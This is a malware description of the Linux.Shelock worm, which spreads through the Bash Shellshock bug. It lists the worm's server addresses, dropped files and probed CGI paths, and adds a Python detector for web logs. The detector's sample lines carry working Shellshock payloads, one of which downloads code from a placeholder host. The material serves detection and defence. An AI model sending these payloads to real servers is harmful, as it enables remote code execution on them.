
Linux.Shelock


First posted on 10 April 2015.
Source: Symantec

Aliases :

There are no other names known for Linux.Shelock.

Explanation :

The worm arrives on the compromised computer after being downloaded from the following location:
[http://]109.228.25.87/.ips-80/cc.[REMOVED]
The worm attempts to exploit computers affected by the GNU Bash Remote Code Execution Vulnerability (CVE-2014-6271), also known as ShellShock or the Bash Bug.

When the worm is executed, it may create the following files:
/var/tmp/.cc/cgiscan32
/var/tmp/.cc/cgiscan64
/var/tmp/.cc/patch
/var/tmp/.cc/paths
/var/tmp/.cc/print
/var/tmp/.cc/r
/var/tmp/.cc/start
/tmp/.cc/cgiscan32
/tmp/.cc/cgiscan64
/tmp/.cc/patch
/tmp/.cc/paths
/tmp/.cc/print
/tmp/.cc/r
/tmp/.cc/start
The worm will download a list of IP addresses from the following location:
[http://]109.228.25.87/.ips-80/[THREE CH[REMOVED]
The worm scans the IP address list and attempts to exploit them.

The worm connects to each target IP address and requests the following paths:
/cgi-bin/php
/cgi-bin/bash
/cgi-bin/contact.cgi
/cgi-bin/defaultwebpage.cgi
/cgi-bin/env.cgi
/cgi-bin/fire.cgi
/cgi-bin/forum.cgi
/cgi-bin/hello.cgi
/cgi-bin/index.cgi
/cgi-bin/login.cgi
/cgi-bin/main.cgi
/cgi-bin/meme.cgi
/cgi-bin/php4
/cgi-bin/php5
/cgi-bin/php5-cli
/cgi-bin/recent.cgi
/cgi-bin/sat-ir-web.pl
/cgi-bin-sdb/printenv
/cgi-bin/test-cgi
/cgi-bin/test.cgi
/cgi-bin/test-cgi.pl
/cgi-bin/test.sh
/cgi-bin/tools/tools.pl
/cgi-mod/index.cgi
/cgi-sys/defaultwebpage.cgi
/cgi-sys/entropysearch.cgi
/cgi-sys/php5
/phppath/cgi_wrapper
/phppath/php
The worm sends the target IP address to the following location:
[http://]109.228.25.87/.c.[REMOVED]
The worm carries a Perl script that it runs on the target host if the host is vulnerable.

The worm uses the Perl script to download and execute a Bash script from the following location:
[http://]109.228.25.87/.c.[REMOVED]
On the vulnerable host, the worm then downloads and executes a copy of Linux.Shelock from the following location:
[http://]109.228.25.87/.ips-80/cc.[REMOVED]
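The scanning behaviour described above leaves a recognisable trail in web server logs: a request to one of the listed CGI paths, carrying a Bash function definition (`() { ... };`) in a header that the CGI interface exports as an environment variable. The following detector is an added example, not code from Symantec or from the worm itself. It parses Apache combined-format lines (the log format and the sample lines are assumptions; the hosts, timestamps and `example.invalid` URL are constructed), flags any line whose User-Agent or Referer matches the CVE-2014-6271 trigger as an exploit attempt, and flags requests for the page's target paths with a benign header as a probe.

```python
"""Detect Shellshock (CVE-2014-6271) probes and exploit attempts in web logs.

Added example; not part of the original write-up. The log format assumed is
Apache "combined" (User-Agent and Referer are the headers it records). The
SAMPLE_LOG lines are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Paths the write-up says Linux.Shelock requests on each target.
SHELOCK_PATHS = frozenset([
    "/cgi-bin/php", "/cgi-bin/bash", "/cgi-bin/contact.cgi",
    "/cgi-bin/defaultwebpage.cgi", "/cgi-bin/env.cgi", "/cgi-bin/fire.cgi",
    "/cgi-bin/forum.cgi", "/cgi-bin/hello.cgi", "/cgi-bin/index.cgi",
    "/cgi-bin/login.cgi", "/cgi-bin/main.cgi", "/cgi-bin/meme.cgi",
    "/cgi-bin/php4", "/cgi-bin/php5", "/cgi-bin/php5-cli",
    "/cgi-bin/recent.cgi", "/cgi-bin/sat-ir-web.pl", "/cgi-bin-sdb/printenv",
    "/cgi-bin/test-cgi", "/cgi-bin/test.cgi", "/cgi-bin/test-cgi.pl",
    "/cgi-bin/test.sh", "/cgi-bin/tools/tools.pl", "/cgi-mod/index.cgi",
    "/cgi-sys/defaultwebpage.cgi", "/cgi-sys/entropysearch.cgi",
    "/cgi-sys/php5", "/phppath/cgi_wrapper", "/phppath/php",
])

# CVE-2014-6271: vulnerable bash treated an imported variable starting with
# "() {" as a function definition and kept executing whatever followed the
# closing "}". Whitespace is optional so "() {:;};" variants are caught too.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Apache combined log line; quoted fields may contain backslash-escaped quotes.
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]+))?" '
    r'(?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)


@dataclass
class Finding:
    host: str
    path: str
    severity: str                  # "exploit" (payload seen) or "probe"
    payload_field: Optional[str]   # header that carried the "() {" payload


def inspect_line(line: str) -> Optional[Finding]:
    """Return a Finding for one log line, or None if it looks benign."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return None  # not in the expected format; leave it to other parsers
    path = m.group("path").split("?", 1)[0]  # compare without query string
    for field in ("ua", "referer"):
        if SHELLSHOCK_RE.search(m.group(field)):
            return Finding(m.group("host"), path, "exploit", field)
    if path in SHELOCK_PATHS:
        return Finding(m.group("host"), path, "probe", None)
    return None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Inspect every line and return the findings in log order."""
    return [f for f in (inspect_line(l) for l in lines) if f is not None]


# Constructed sample: two exploit attempts, two path probes, one benign hit.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Apr/2015:03:14:15 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" '
    '200 512 "-" "() { :;}; /bin/bash -c \\"cd /tmp; wget http://example.invalid/cc\\""',
    '198.51.100.23 - - [10/Apr/2015:03:14:16 +0000] "GET /cgi-bin/php HTTP/1.0" '
    '404 209 "() {:;}; /bin/ping -c 1 198.51.100.23" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Apr/2015:03:14:17 +0000] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" '
    '404 209 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [10/Apr/2015:03:14:18 +0000] "GET /index.html HTTP/1.1" '
    '200 1024 "http://example.invalid/" "Mozilla/5.0 (X11; Linux x86_64)"',
    '192.0.2.11 - - [10/Apr/2015:03:14:19 +0000] "GET /cgi-bin/test-cgi?id=1 HTTP/1.1" '
    '404 209 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A caveat worth keeping in mind: the combined format records only User-Agent and Referer, but a CGI server exports every request header (Cookie, Host, Accept and the rest) into the environment, so a payload in any of them is just as effective and will not appear in this log. To see those you need full header logging, a WAF rule on the same `() {` pattern, or a patched bash, which is the real fix.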

Last update 10 April 2015
